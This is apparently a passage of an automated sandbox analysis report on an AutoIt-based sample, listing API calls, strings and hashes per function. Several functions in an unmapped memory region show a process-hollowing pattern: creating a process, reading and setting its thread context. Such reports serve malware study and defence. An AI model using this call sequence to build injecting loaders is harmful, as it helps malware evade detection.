• Instruction Fuzzy Hash: 45A16A32A041088FDF28AF68DC51BBD7BA1AF06320F140159F951DF3A2DB358D16EB91

Control-flow Graph

APIs
  • Part of subcall function 00FB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01081418,?,00FB2E7F,?,?,?,00000000), ref: 00FB3A78
  • Part of subcall function 00FB3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FB3379
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FB356A
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FF318D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FF31CE
• RegCloseKey.ADVAPI32(?), ref: 00FF3210
• _wcslen.LIBCMT ref: 00FF3277
• _wcslen.LIBCMT ref: 00FF3286
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: 57fa606fcc656c7403b02cb8ebfdaa4feb12a578625973e3f9f19c7a70aacb82
• Instruction ID: bda101b1985c7d382c5712cd1ad91126928c683063c04f8ed71a43cf5e420d80
• Opcode Fuzzy Hash: 57fa606fcc656c7403b02cb8ebfdaa4feb12a578625973e3f9f19c7a70aacb82
• Instruction Fuzzy Hash: 3D71BDB14083019EC324EF66EC919AFBBE8FF85750F40842EF5C593164EB799A48DB52

Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00FB2B8E
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00FB2B9D
                                                                                                            • LoadIconW.USER32(00000063), ref: 00FB2BB3
                                                                                                            • LoadIconW.USER32(000000A4), ref: 00FB2BC5
                                                                                                            • LoadIconW.USER32(000000A2), ref: 00FB2BD7
                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB2BEF
                                                                                                            • RegisterClassExW.USER32(?), ref: 00FB2C40
                                                                                                              • Part of subcall function 00FB2CD4: GetSysColorBrush.USER32(0000000F), ref: 00FB2D07
                                                                                                              • Part of subcall function 00FB2CD4: RegisterClassExW.USER32(00000030), ref: 00FB2D31
                                                                                                              • Part of subcall function 00FB2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB2D42
                                                                                                              • Part of subcall function 00FB2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FB2D5F
                                                                                                              • Part of subcall function 00FB2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB2D6F
                                                                                                              • Part of subcall function 00FB2CD4: LoadIconW.USER32(000000A9), ref: 00FB2D85
                                                                                                              • Part of subcall function 00FB2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB2D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                            • API String ID: 423443420-4155596026
                                                                                                            • Opcode ID: a56d8045ba2bd6ba624394af854d2975f1c1826c73637f06c311f7962e5ebd03
                                                                                                            • Instruction ID: a6f8cb13488f407fc2861dd46cd2e62d87a04ef6d822bc1da432b545bc7443c0
                                                                                                            • Opcode Fuzzy Hash: a56d8045ba2bd6ba624394af854d2975f1c1826c73637f06c311f7962e5ebd03
                                                                                                            • Instruction Fuzzy Hash: 82214CB4E05314AFDB20DFA6E985ADD7FB5FF08B50F00801AE580A6694D7BA0541DF90

                                                                                                             Control-flow Graph (function 00FB3170, blocks fb3170-fb326d and ff2d9c-ff2e96; the rendered graph and its executed/not-executed colouring are not reproduced in this text): blocks call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus, plus internal subroutines fb18e2, fb30f2, fb3c50, fb326f, fb3837, fce499, 1010ad7, 101bf30 and 101c161.
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FB316A,?,?), ref: 00FB31D8
                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00FB316A,?,?), ref: 00FB3204
                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB3227
                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FB316A,?,?), ref: 00FB3232
                                                                                                            • CreatePopupMenu.USER32 ref: 00FB3246
                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00FB3267
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                            • String ID: TaskbarCreated
                                                                                                            • API String ID: 129472671-2362178303
                                                                                                            • Opcode ID: 6d1d60b67c2d9360c9375bb3d4510e225e84949a35cb2280157dd6f6a4e10193
                                                                                                            • Instruction ID: b7d8a6a2f82ef0343541df37678944850c15dd26cccbc8a88805b128e9aa9a48
                                                                                                            • Opcode Fuzzy Hash: 6d1d60b67c2d9360c9375bb3d4510e225e84949a35cb2280157dd6f6a4e10193
                                                                                                            • Instruction Fuzzy Hash: 84412B36AC8204ABDB246B7DDE4ABFD3A1DFF05350F044119F5C2C5295CB7A8A41BB61

                                                                                                             Control-flow Graph (function 014DAFE8, blocks 14dafe8-14db2ea; the rendered graph and its executed/not-executed colouring are not reproduced in this text): blocks call CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree, plus internal subroutines 14d89e8, 14dbef8, 14dc148 and 14dbf58; there is a back edge from block 14db206 to the CreateFileW block at 14db09d. Only CreateFileW and VirtualFree appear in the APIs list for this function; VirtualAlloc, ReadFile and CloseHandle are visible only in the graph.
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014DB0B9
                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014DB2DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileFreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 204039940-0
                                                                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                            • Instruction ID: 42ebe7f16ee8d61235b1fc2c2457e648efe376ed2ac6055728abf16c767836a8
                                                                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                            • Instruction Fuzzy Hash: E2A10875E00209EBDF14CFA4C8A8BAEBBB5FF49304F20815AE615BB390D7759A41CB54

                                                                                                             Control-flow Graph (function 00FB2C63, single block fb2c63-fb2cd3; the rendered graph is not reproduced in this text): CreateWindowExW called twice, ShowWindow called twice.
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB2C91
                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB2CB2
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB1CAD,?), ref: 00FB2CC6
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB1CAD,?), ref: 00FB2CCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CreateShow
                                                                                                            • String ID: AutoIt v3$edit
                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                            • Opcode ID: 9b652c30a58f513b57dee2ab85593c0ad60f7877e2449ec92202fc697cce22a5
                                                                                                            • Instruction ID: 9eef1ebefd3428ece72a3636da0b4b6219304289dce549b90863c9c8fc02daf1
                                                                                                            • Opcode Fuzzy Hash: 9b652c30a58f513b57dee2ab85593c0ad60f7877e2449ec92202fc697cce22a5
                                                                                                            • Instruction Fuzzy Hash: A8F03AB95443907FEB300713AC4CEBB2EBDEBC6F50B00806EF980A2154C27A0842DBB0

                                                                                                             Control-flow Graph (function 014DAD98, blocks 14dad98-14daf9e; the rendered graph and its executed/not-executed colouring are not reproduced in this text): blocks call CreateFileW, VirtualAlloc and ReadFile, then subroutines 14dacc8 and 14d9c88 (the latter is the CreateProcessW / Wow64GetThreadContext routine graphed in its own entry), then either subroutine 14dad18 or ExitProcess directly; other internal subroutines are 14d89e8 and 14dac88. Only CreateFileW and the Sleep subcall appear in the APIs list for this function; VirtualAlloc, ReadFile and ExitProcess are visible only in the graph.
                                                                                                            APIs
                                                                                                              • Part of subcall function 014DAC88: Sleep.KERNELBASE(000001F4), ref: 014DAC99
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014DAED8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileSleep
                                                                                                            • String ID: 150Y6ZEWGLQ7JI7HKLYHAOWILQ
                                                                                                            • API String ID: 2694422964-4047189720
                                                                                                            • Opcode ID: adc43201adb653bc1989af4f2424be0b5e75924d0e8ca35fcd8bf9c209c8cf97
                                                                                                            • Instruction ID: d0bce00ad28935c31b7169a02c6a200fe9c6e6ff0df2d0c503af0d0949d385b2
                                                                                                            • Opcode Fuzzy Hash: adc43201adb653bc1989af4f2424be0b5e75924d0e8ca35fcd8bf9c209c8cf97
                                                                                                            • Instruction Fuzzy Hash: 2C619170D04288DAEF11DBB8C858BEEBBB49F15304F144199E2487B2C1C6B94B49CBA6

                                                                                                             Control-flow Graph (function 00FB3B1C, blocks fb3b1c-fb3b9b; the rendered graph and its executed/not-executed colouring are not reproduced in this text): RegOpenKeyExW, then RegQueryValueExW on success, then RegCloseKey.
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FB3B0F,SwapMouseButtons,00000004,?), ref: 00FB3B40
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FB3B0F,SwapMouseButtons,00000004,?), ref: 00FB3B61
                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00FB3B0F,SwapMouseButtons,00000004,?), ref: 00FB3B83
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Control Panel\Mouse
                                                                                                            • API String ID: 3677997916-824357125
                                                                                                            • Opcode ID: 1cfe87a2388660b91f32fb4392ed20af733bc1c2f6dc9684dace6ae2700a6c7f
                                                                                                            • Instruction ID: 04be811b27ecdde99211f09479afb64f1152d386757e5b8690442a7fbfafa312
                                                                                                            • Opcode Fuzzy Hash: 1cfe87a2388660b91f32fb4392ed20af733bc1c2f6dc9684dace6ae2700a6c7f
                                                                                                            • Instruction Fuzzy Hash: 26115AB5551208FFDB208FA6DD84AEEB7B8EF41750B108559B801D7118D6319E40AB60

                                                                                                             Control-flow Graph (function 014D9C88, blocks 14d9c88-14da84b; the rendered graph and its executed/not-executed colouring are not reproduced in this text): blocks call CreateProcessW (block 14da41b), Wow64GetThreadContext (14da4c4), ReadProcessMemory (14da4e5) and Wow64SetThreadContext (14da770), plus internal subroutines 14dc128, 14db7a8, 14db8e8, 14db6f8, 14dc148, 14db2f8 and 14db628. Wow64SetThreadContext is visible only in the graph and does not appear in the APIs list for this function.
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 014DA443
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DA4D9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DA4FB
Memory Dump Source
• Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
• Instruction ID: 202a1e3275584adb9dd276083a3afe42e57986a86684b8d4bb83878519fde1e2
• Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
• Instruction Fuzzy Hash: EA62FC30A14258DBEB24CFA4C855BDEB776EF58300F1091A9D10DEB3A0E7799E81CB59
Strings
• Variable must be of type 'Object'., xrefs: 010032B7
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: cccaacf2bcf9389da1679e848b805ce137597ef8a432b90d9be22ce9f54e795e
• Instruction ID: e1981b755b64bd48e1bc67addb01278761d643315226220ee4898fbd7d9f6da7
• Opcode Fuzzy Hash: cccaacf2bcf9389da1679e848b805ce137597ef8a432b90d9be22ce9f54e795e
• Instruction Fuzzy Hash: F5C26575E00215CFDB25CF59C881BEDBBF1BB08310F288169E986AB291D735AD41EF91
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FF33A2
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB3A04
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
• Opcode ID: 8b2f9333e46c55b3e55e57b178362774547c038f635b8f09e44adf6c8ae1350d
• Instruction ID: 6654dbb603b4d90e8a5defa777c19e7bba614eec129ca972a1b7ebcc2953e8c8
• Opcode Fuzzy Hash: 8b2f9333e46c55b3e55e57b178362774547c038f635b8f09e44adf6c8ae1350d
• Instruction Fuzzy Hash: D631C071848304AFD725EB21DC45BEFB7E8AF40720F14452AF5D982185EF789A49EBC2
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0668
  • Part of subcall function 00FD32A4: RaiseException.KERNEL32(?,?,?,00FD068A,?,01081444,?,?,?,?,?,?,00FD068A,00FB1129,01078738,00FB1129), ref: 00FD3304
• __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0685
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: f65bcbc4c885394cf2eb6396a8f97332224b8c233552ce993fef78d61fb09512
• Instruction ID: 36285d33cfe3879bed652e2163e5be638c66d7f92c0e407da3e3769c28c03b45
• Opcode Fuzzy Hash: f65bcbc4c885394cf2eb6396a8f97332224b8c233552ce993fef78d61fb09512
• Instruction Fuzzy Hash: 91F02834C0020E73CB00B664EC4AF5DB76F6E00320F584037B91586691EF34DA29E580
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 010382F5
• TerminateProcess.KERNEL32(00000000), ref: 010382FC
• FreeLibrary.KERNEL32(?,?,?,?), ref: 010384DD
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: 997b864efdc321d591180432ab998919b88aa782605cbd9be54df68206f75ea5
• Instruction ID: 817f4a1561acdb12579ec4a990b89c3ea5d3b59996248d630a1002d7f904accc
• Opcode Fuzzy Hash: 997b864efdc321d591180432ab998919b88aa782605cbd9be54df68206f75ea5
• Instruction Fuzzy Hash: 77126B719083019FD754DF28C484B6ABBE5BFC4314F04899EF9898B252DB35E945CF92
APIs
  • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB1BF4
  • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB1BFC
  • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB1C07
  • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB1C12
  • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB1C1A
  • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB1C22
  • Part of subcall function 00FB1B4A: RegisterWindowMessageW.USER32(00000004,?,00FB12C4), ref: 00FB1BA2
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FB136A
• OleInitialize.OLE32 ref: 00FB1388
• CloseHandle.KERNEL32(00000000,00000000), ref: 00FF24AB
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: 12e9e63889e0d44b5db9144ade24756cff86dee602a52429492021c1b2f00ece
• Instruction ID: 4acd64185be5f98dd889e5059016266c154f4862c332e709b64d0b742039d089
• Opcode Fuzzy Hash: 12e9e63889e0d44b5db9144ade24756cff86dee602a52429492021c1b2f00ece
• Instruction Fuzzy Hash: 9B71BCB491D200DFC3A4EF7AE9566993AE0BF48344758822AD0CAC7349EB3A4403DF64
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,00FE85CC,?,01078CC8,0000000C), ref: 00FE8704
• GetLastError.KERNEL32(?,00FE85CC,?,01078CC8,0000000C), ref: 00FE870E
• __dosmaperr.LIBCMT ref: 00FE8739
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: 783ab2411e2fd6be9bf16170863f722d3459e235338bf653bd40801df04d6f16
• Instruction ID: 2c7a6fad6f749b1421dc1127bc27971ac8479d564b0c0252f2dac04160d4f8ca
• Opcode Fuzzy Hash: 783ab2411e2fd6be9bf16170863f722d3459e235338bf653bd40801df04d6f16
• Instruction Fuzzy Hash: 70012B33E056E02AD7347236A945B7E774A4B81BF8F390119F81C9B1D3DEA98C82B251
APIs
• __Init_thread_footer.LIBCMT ref: 00FC17F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
• Opcode ID: 6bbc5ce0af5a345a9b7ac7eb8dae2fc3ddddaca6a0a0b2e42415b170c0edb84c
• Instruction ID: 39837e2781d8f52cd3dd4ce7cccd64a073c5035d090c8cf5b5e9ae0352dcbd08
• Opcode Fuzzy Hash: 6bbc5ce0af5a345a9b7ac7eb8dae2fc3ddddaca6a0a0b2e42415b170c0edb84c
• Instruction Fuzzy Hash: B4228E705082029FD714DF14C981F2ABBF2BF86314F18895DF4968B392D736E865DB92
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00FF2C8C
  • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
